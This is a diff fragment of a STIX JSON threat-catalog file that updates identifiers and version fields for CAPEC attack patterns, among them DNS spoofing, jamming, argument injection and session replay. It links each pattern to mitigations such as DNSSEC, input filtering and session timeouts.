"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5edc0bd4-6178-47c7-910c-609c52ee4935", - "source_ref": "course-of-action--06e73535-1dbe-476e-89d0-45b6466eece6", + "id": "relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--fd042313-f5ac-4d05-b6db-41daf46f48a8", - "source_ref": "course-of-action--f1521ff8-975a-4136-845c-402ee9caf052", + "id": "relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--932dd295-e918-4462-bcb1-dd21e381cca4", - "source_ref": "course-of-action--72ce3172-3c82-41af-ab0d-889a1f4d31b6", + "id": "relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3b18c6eb-afde-40f7-a139-1b3e50ec19cf", - "source_ref": "course-of-action--868ce927-2671-4b33-b1c3-43a0804db42e", + "id": "relationship--82d42851-afd1-4779-8f44-f9216f67318f", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4c21f886-8ca5-4d89-8962-aa5f72649949", - "source_ref": "course-of-action--0724227e-ebfe-4a31-a6c1-f2efae56cb23", + "id": "relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3dfeb74d-da5b-464c-a7d3-f2ccd12f3f31", - "source_ref": "course-of-action--92a98fdf-e5e4-4e90-8fe8-21de71ac3c5d", + "id": "relationship--25fc7307-68af-4ebd-b242-54b63889347d", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ff86f290-16ff-487b-9d9a-ca68e473ed4e", - "source_ref": "course-of-action--9953201a-e853-49b4-8ef4-c440e23164c6", + "id": "relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { "name": "DNS Spoofing", "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a targets route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the targets DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the targets infrastructure uses.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -35426,140 +36064,141 @@ "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "id": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-598-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Avoid dependence on DNS", "type": "course-of-action", - "id": "course-of-action--b60f1e9d-dc0e-4ca7-a65f-824ec9e3a3a0" + "id": "course-of-action--e179c216-27fd-4547-9dce-78b800823e09" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b39f90f3-0f06-4c09-95f1-5509129ddc65", - "source_ref": "course-of-action--b60f1e9d-dc0e-4ca7-a65f-824ec9e3a3a0", + "id": "relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671", + "source_ref": "course-of-action--e179c216-27fd-4547-9dce-78b800823e09", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-598-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Include \"hosts file\"/IP address in the application", "type": "course-of-action", - "id": "course-of-action--0dca4dcc-b6e6-41af-83da-8f330401f3f5" + "id": "course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b83db1ba-df4e-48d8-a5d7-73bf1dcd9677", - "source_ref": "course-of-action--0dca4dcc-b6e6-41af-83da-8f330401f3f5", + "id": "relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0", + "source_ref": "course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-598-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Utilize a .onion domain with Tor support", "type": "course-of-action", - "id": "course-of-action--4abc0693-4807-4e4e-89e3-0937049a9598" + "id": "course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--36d92d08-6db0-4790-a9df-95de22258227", - "source_ref": "course-of-action--4abc0693-4807-4e4e-89e3-0937049a9598", + "id": "relationship--f8ea324e-3205-4840-9f4d-882dd1653a69", + "source_ref": "course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-598-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: DNSSEC", "type": "course-of-action", - "id": "course-of-action--cfbcd594-619d-48b9-8d94-cdf8ed3302d1" + "id": "course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e73e1d23-ec76-4fba-af8b-feab67173e3c", - "source_ref": "course-of-action--cfbcd594-619d-48b9-8d94-cdf8ed3302d1", + "id": "relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6", + "source_ref": "course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-598-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: DNS-hold-open", "type": "course-of-action", - "id": "course-of-action--85180c82-d86c-481b-ade5-bafddd1a2c52" + "id": "course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a02ffaa9-da4b-4eb1-a836-befbb1058f00", - "source_ref": "course-of-action--85180c82-d86c-481b-ade5-bafddd1a2c52", + "id": "relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2", + "source_ref": "course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f45a2f9-1f1a-456d-a6e4-b578a3d9cd16" + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651" }, { "name": "Terrestrial Jamming", "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -35590,18 +36229,19 @@ "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--77baff26-86fd-4ee7-bb6b-b8c5781c4c9f" + "id": "attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9" }, { "name": "Argument Injection", "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -35687,90 +36327,91 @@ "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [R.6.2]" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--163b749f-1b9e-4777-bd57-67a3a5fe9ce8" + "id": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-6-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", "type": "course-of-action", - "id": "course-of-action--89bfc9bb-2f81-42fb-a6e1-c581caf1a739" + "id": "course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--49eff042-480a-441b-aa8c-4f57f9d883f5", - "source_ref": "course-of-action--89bfc9bb-2f81-42fb-a6e1-c581caf1a739", + "id": "relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b", + "source_ref": "course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--163b749f-1b9e-4777-bd57-67a3a5fe9ce8" + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-6-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", "type": "course-of-action", - "id": "course-of-action--9bb5b925-03e8-4413-81eb-16df30fb1c7a" + "id": "course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d43328ea-b1b4-479c-ae0c-3ea9f43b2208", - "source_ref": "course-of-action--9bb5b925-03e8-4413-81eb-16df30fb1c7a", + "id": "relationship--4565c93a-9073-48e1-95b3-7c1d7424096e", + "source_ref": "course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--163b749f-1b9e-4777-bd57-67a3a5fe9ce8" + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-6-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", "type": "course-of-action", - "id": "course-of-action--79279ac0-27d0-428c-96c9-4904fc8da91f" + "id": "course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c294406c-d5b9-44a4-956c-7a12e85bf1d0", - "source_ref": "course-of-action--79279ac0-27d0-428c-96c9-4904fc8da91f", + "id": "relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595", + "source_ref": "course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--163b749f-1b9e-4777-bd57-67a3a5fe9ce8" + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8" }, { "name": "Reusing Session IDs (aka Session Replay)", "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -35864,168 +36505,169 @@ "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "id": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Always invalidate a session ID after the user logout.", "type": "course-of-action", - "id": "course-of-action--1fdea3b7-c2cf-4eff-809a-7636ce3984f8" + "id": "course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--44931a92-2842-43e4-899e-b281ec47f814", - "source_ref": "course-of-action--1fdea3b7-c2cf-4eff-809a-7636ce3984f8", + "id": "relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9", + "source_ref": "course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Setup a session time out for the session IDs.", "type": "course-of-action", - "id": "course-of-action--f14e9d4b-fcc9-43b4-b093-7265efe71f0a" + "id": "course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8aebc7ef-931f-42f0-8a92-f961c71a291a", - "source_ref": "course-of-action--f14e9d4b-fcc9-43b4-b093-7265efe71f0a", + "id": "relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd", + "source_ref": "course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate man in the middle attack.", "type": "course-of-action", - "id": "course-of-action--1b408bc3-c769-46db-af34-6e2c6bb908a0" + "id": "course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--52800db4-356a-41ea-b61a-eda385ca4bf2", - "source_ref": "course-of-action--1b408bc3-c769-46db-af34-6e2c6bb908a0", + "id": "relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46", + "source_ref": "course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.", "type": "course-of-action", - "id": "course-of-action--bc58da04-f359-437e-8811-e14cc5294a4a" + "id": "course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", 